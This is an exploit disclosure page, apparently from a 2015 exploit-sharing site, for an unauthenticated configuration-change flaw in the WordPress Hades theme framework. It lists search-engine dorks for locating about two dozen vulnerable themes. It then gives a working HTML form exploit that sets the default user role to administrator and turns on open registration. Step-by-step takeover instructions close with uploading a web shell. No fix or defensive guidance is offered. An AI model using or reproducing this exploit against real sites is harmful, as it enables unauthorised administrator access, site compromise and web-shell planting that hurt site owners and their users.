facebook facebook twitter rss

WordPress Hades framework suffers from Unauthenticated Configuration Access

Author: X-Bruno , Published: 29-01-2015
================== WordPress Hades framework suffers from Unauthenticated Configuration Access. ================== 

Author : X-Bruno
EMail: hellerx338@yahoo.com
fb:https://www.facebook.com/01a306ec6fde32404eb87acb23b489d0
=================================================================


the vulnerability allow the attacker to change the default user type to administrator,
then allows anyone to register. This allows the attacker to register and become
an administrator.

There's Many WordPress Themes/Plugins Vulnerable...

inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
inurl:/wp-content/themes/test/
inurl:/wp-content/themes/Viteeo/
inurl:/wp-content/themes/vithy/
inurl:/wp-content/themes/yvora/
inurl:/wp-content/themes/sodales/

Exploit :

<form action="http://127.0.0.1/wp-content/themes/{%THEME%}/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="{%YOUR_EMAIL}">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>

1. Change {%THEME%} with the vulnerable theme, {%YOUR_EMAIL} with your email address.
2. go to http://127.0.0.1/wp-login.php?action=register, you will see the registration form.
3. choose your username & email address and register.
4. go to your email, you will find your password.
5. then login & and upload your shell

Like us on Facebook :